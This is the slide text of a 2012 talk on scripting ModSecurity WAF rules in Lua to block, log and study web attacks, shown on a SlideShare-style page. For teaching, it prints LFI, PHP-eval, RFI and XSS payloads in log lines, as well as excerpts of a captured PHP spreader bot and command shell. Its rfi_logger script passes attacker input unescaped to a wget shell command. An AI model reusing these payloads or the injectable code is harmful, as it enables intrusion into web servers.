Profiling PHP with Xdebug / Webgrind
 
soft-shake.ch - Hands on Node.js
soft-shake.ch - Hands on Node.jssoft-shake.ch - Hands on Node.js
soft-shake.ch - Hands on Node.js
 
Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2 Osiąganie mądrej architektury z Symfony2
Osiąganie mądrej architektury z Symfony2
 
node.js practical guide to serverside javascript
node.js practical guide to serverside javascriptnode.js practical guide to serverside javascript
node.js practical guide to serverside javascript
 
Phing i Fabric - Budowanie i deployment aplikacji webowych
Phing i Fabric - Budowanie i deployment aplikacji webowychPhing i Fabric - Budowanie i deployment aplikacji webowych
Phing i Fabric - Budowanie i deployment aplikacji webowych
 
WebGUI Developers Workshop
WebGUI Developers WorkshopWebGUI Developers Workshop
WebGUI Developers Workshop
 
PHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source ProjectPHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source Project
 
Write php deploy everywhere
Write php deploy everywhereWrite php deploy everywhere
Write php deploy everywhere
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: Backend
 
Infrastructure = code - 1 year later
Infrastructure = code - 1 year laterInfrastructure = code - 1 year later
Infrastructure = code - 1 year later
 
Php web backdoor obfuscation
Php web backdoor obfuscationPhp web backdoor obfuscation
Php web backdoor obfuscation
 
Ansible new paradigms for orchestration
Ansible new paradigms for orchestrationAnsible new paradigms for orchestration
Ansible new paradigms for orchestration
 

More from Robert Rowley

WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)
Robert Rowley
 
Detecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor SurveillanceDetecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor Surveillance
Robert Rowley
 
Privacy; Past, Present and Future
Privacy; Past, Present and FuturePrivacy; Past, Present and Future
Privacy; Past, Present and Future
Robert Rowley
 
Wordpress Security 101
Wordpress Security 101Wordpress Security 101
Wordpress Security 101
Robert Rowley
 
State of Web App Security 2012
State of Web App Security 2012State of Web App Security 2012
State of Web App Security 2012
Robert Rowley
 
Juice Jacking 101
Juice Jacking 101Juice Jacking 101
Juice Jacking 101
Robert Rowley
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumeration
Robert Rowley
 

More from Robert Rowley (7)

WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)WordPress Security (know your enemy WordCamp Kyoto)
WordPress Security (know your enemy WordCamp Kyoto)
 
Detecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor SurveillanceDetecting and Defending Your Privacy Against State-Actor Surveillance
Detecting and Defending Your Privacy Against State-Actor Surveillance
 
Privacy; Past, Present and Future
Privacy; Past, Present and FuturePrivacy; Past, Present and Future
Privacy; Past, Present and Future
 
Wordpress Security 101
Wordpress Security 101Wordpress Security 101
Wordpress Security 101
 
State of Web App Security 2012
State of Web App Security 2012State of Web App Security 2012
State of Web App Security 2012
 
Juice Jacking 101
Juice Jacking 101Juice Jacking 101
Juice Jacking 101
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumeration
 

Recently uploaded

20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
Matthew Sinclair
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
Alex Pruden
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
Neo4j
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
Matthew Sinclair
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
RinaMondal9
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
SOFTTECHHUB
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
Pierluigi Pugliese
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
nkrafacyberclub
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
Octavian Nadolu
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems S.M.S.A.
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
Kumud Singh
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Vladimir Iglovikov, Ph.D.
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Nexer Digital
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
Kari Kakkonen
 

Recently uploaded (20)

20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 

Teaching Your WAF New Tricks

  • 1. © 2012 Presented by: Teaching your WAF new tricks Robert Rowley Security Researcher rrowley@trustwave.com
  • 2. © 2012 Disclaimer: The scripts contained in these slides are not recommended for you to use in production. If you get fired, it's your own fault. Harass me on twitter: @iamlei
  • 3. © 2012 Agenda • Preamble – Writing a normal rule – Lua introduction – Scripting with: exec, @inspectFile, SecRuleScript • Counter Intelligence – RFI hunting/gathering – Malicious request intelligence collection – That WordPress Incident
  • 5. © 2012 Mod sec intro  Write a rule  Block, Log, Repeat  Apache  IIS, Nginx (Beta)
  • 7. © 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ...
  • 8. © 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 100” deny
  • 9. © 2012 Normal WAF rule Example: Hash Collision DoS (CVE-2011-4885)  http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=& EzEzEzEzEzEzEzFY =&EzEzEzEzEzEzEzG8= &EzEzEzEzEzEzEzH %17=&EzEzEzEzEzEzFYEz= &EzEzEzEzEzEzFYFY=& EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=& EzEzEzEzEzEzG8Ez =&EzEzEzEzEzEzG8FY=& ... SecRule &ARGS “@gt 1000” deny
  • 11. © 2012 Which one is not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
  • 12. © 2012 Which one is not like the others? 192.168.69.101 "GET /index.php?include=pages” HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...” 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00” HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>” 192.168.69.101 "GET /” HTTP/1.1" 200 “Mozilla/5.0 (compatible; Baiduspider/2.0; ...”
  • 13. © 2012 Another Normal Rule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny Blocks: 192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00 HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>”
  • 14. © 2012 Another Normal Rule Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny
  • 15. © 2012 Not So Normal Example: SecRule REQUEST_HEADER:User-Agent “<?php” deny,exec:dirty_firewaller.lua
  • 16. © 2012 A little lua intro  Object oriented (Everything is a table)  Light and easy  Available in other tools – Nmap – Wireshark – WoW
  • 17. © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
  • 18. © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
  • 19. © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:dirty_firewaller.lua --- dirty_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) os.execute(“iptables -A INPUT -s “..bad_ip..” -j DROP”) end
  • 20. © 2012 EXEC Example: SecRule REQUEST_HEADERS:User-Agent “<?php” deny,exec:htaccess_firewaller.lua --- htaccess_firewaller.lua --- function main() local bad_ip = m.getvar(REMOTE_ADDR) local fh = io.open(“/path/to/.htaccess”, a+) fh:write(“deny from “..bad_ip) fh:close() end
  • 21. © 2012 Using @inspectFile SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny
  • 22. © 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 23. © 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 24. © 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 25. © 2012 Example script (AV) SecRule FILES_TMPNAMES “@inspectFile file_inspector.lua” deny --- file_inspector.lua --- function main(filename) local fh = io.open(filename, “r”) while(line = fh:read()) do if(string.match(line, 'MALICIOUS')) then return 1 end end end
  • 26. © 2012 SpiderLabs making it awesome • Implemented their own AV detection using ClamAV • It’s in the spiderlabs github • https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/ runav.pl
  • 27. © 2012 Matching With Scripts SecRuleScript “check_blacklist.lua” deny
  • 28. © 2012 Matching With Scripts SecRuleScript “check_blacklist.lua” deny --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
  • 29. © 2012 Matching With Scripts SecRule REQUEST_URI “admin” deny,chain SecRuleScript “check_blacklist.lua” --- check_blacklist.lua --- function main() local ip = m.getvar('REMOTE_ADDR') for line in io.lines("blacklist.txt") do if string.match(ip, line) then return 1 end end end
  • 30. © 2012 SpiderLabs making it awesome #2 “ipMatchFromFile” implemented in release 2.7 SecRule REQUEST_URI “admin” deny,chain SecRule ‘@ipMatchFromFile blacklist.txt’
  • 31. © 2012© 2012 Counter Intelligence
  • 32. © 2012 RFI Hunting 192.168.69.101 - - [08/Oct/2012:11:19:27 -0700] "GET /thumb.php?src=http://site.com/shell.txt HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Trivial to pull from logs
  • 33. © 2012 RFI Hunting 192.168.69.101 - - [08/Oct/2012:11:12:43 -0700] "POST /thumb.php HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Problem …
  • 34. © 2012 rfi_logger.lua SecRule ARGS “^http://” allow,exec:rfi_logger.lua function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") for j = 1, #args do if(string.match(args[j].value, 'http')) then fh = io.open("/tmp/backdoor", "a") fh:write("---"..ip.." "..url.." "..args[j].name.."="..args[j].value.."---n") fh:close() os.execute("wget –q –x -P /tmp/rfi_files/ '"..args[j].value) end end end
  • 35. © 2012 <?php ###[ SEMBON CrEw SPREAD for RFIBot (2.3) ]### error_reporting(0); ##### CONFIG ##### $mode = $_GET["mode"]; $url = 'http://www.web-faq.jp/click_counter/data/.data/'; //URL path $src = $url.'cmd'; //Source Shell $shell = '404.php'; //Backdoor PHPShell name $bot = $url.'bot'; //Source PHPBot ##### SPREAD ##### ... die(base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Failed!'); //encode biar lebih optimal! } ... It works
  • 36. © 2012 <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C> <H1>Changing this CMD will result in corrupt scanning !</H1> </html></head></body> <?php ... function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } ... It works
  • 37. © 2012 Better than a blacklist 1) Capture Request 2) Log IP Malicious Request WAF script
  • 38. © 2012 Better than a blacklist Request WAF script Unobstructed Response 1) Capture Request 2) Log All Data Malicious Host Unknown Host
  • 39. © 2012 Put it together SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua
  • 40. © 2012 Put it together SecRule REQUEST_HEADERS:User-Agent “<? php” deny,status:200,exec:blacklist_ip.lua --- blacklist_ip.lua --- function main() local ip = m.getvar("REMOTE_ADDR") fh = io.open("blacklist.txt", "a") fh:write(ip.."n") fh:close() end
  • 41. © 2012 Put it together SecRule ‘@ipMatchFromFile blacklist.txt’ deny,status:200,exec:uber_logger.lua --- uber_logger.lua --- function main() local ip = m.getvar("REMOTE_ADDR") local url = m.getvar("REQUEST_URI") local args = m.getvars("ARGS") local headers = m.getvars("REQUEST_HEADERS") local logstring = " " for j = 1, #headers do logstring = logstring.." "..headers[j].name.."="..headers[j].value end for j = 1, #args do logstring = logstring.." "..args[j].name.."="..args[j].value end fh = io.open("/tmp/uberlog", "a+") fh:write(ip.." "..url.." "..logstring.."n") fh:close() end
  • 42. © 2012 Put it together Uberlog data 69.110.217.76 /index.php?arg=<script>alert(1);</script> REQUEST_HEADERS:User-Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:arg=<script>alert(1);</script> 69.110.217.76 /index.php?-s REQUEST_HEADERS:User- Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:-s=
  • 43. © 2012 Data Mining Capture only on malicious requests Log far more data – REQUEST_HEADERS – POST variables – COOKIE data – FILES uploaded in the request – GeoIP information – Live data on the attack – Make pretty* graphs * OK they are not that pretty
  • 47. © 2012 The WordPress Incident (Monitoring Brute Force Attacks) “Massive” WordPress attack in early April 2013. Reported by several Hosting providers as reason for outages. A Mr. Brian K. blogged that it was a botnet recruiting run. Coincidentally: I had been monitoring wp-login.php requests with full data for months.
  • 48. © 2012 The WordPress Incident (Why was I logging?) Someone* complained on twitter** Their logs looked like this: POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php POST wp-login.php They wanted to know more. * it was @Viss ** First time ever that complaining on twitter was beneficial, but not to the complainer.
  • 49. © 2012 The WordPress Incident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua
  • 50. © 2012 The WordPress Incident (Script I re-used) I decided to put the “ueberlogger.lua” script to work. SecRule REQUEST_URI wp-login.php allow,exec:uberlogger.lua x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=1admin x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=admins x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=webmaster x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=password x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=111111 x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=naruto
  • 51. © 2012 The WordPress Incident (Data I got) Password list of the brute force Frequency of attacks against sites I controlled Passwords naruto pokemon 123456 admin Sitename123 etc... Correlated with the data from other researchers
  • 52. © 2012 The WordPress Incident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
  • 53. © 2012 The WordPress Incident (My Perspective) ● It was a brute force, but a lame one. ● It got press because hosts were going down. ● Evidence that WP auth mechanisms can cause DoS. ● WordPress is a buzzword for security press ● Read my article all about WP auth on the blog.spiderlabs.com :).
  • 54. © 2012 Bibliography/Questions?  http://www.modsecurity.org  http://www.lua.org  http://blog.spiderlabs.com SpiderLabs github  https://github.com/SpiderLabs You seriously want my code?  https://github.com/rawrly/ModSecScripts Take your pitchfork to me on twitter: @iamlei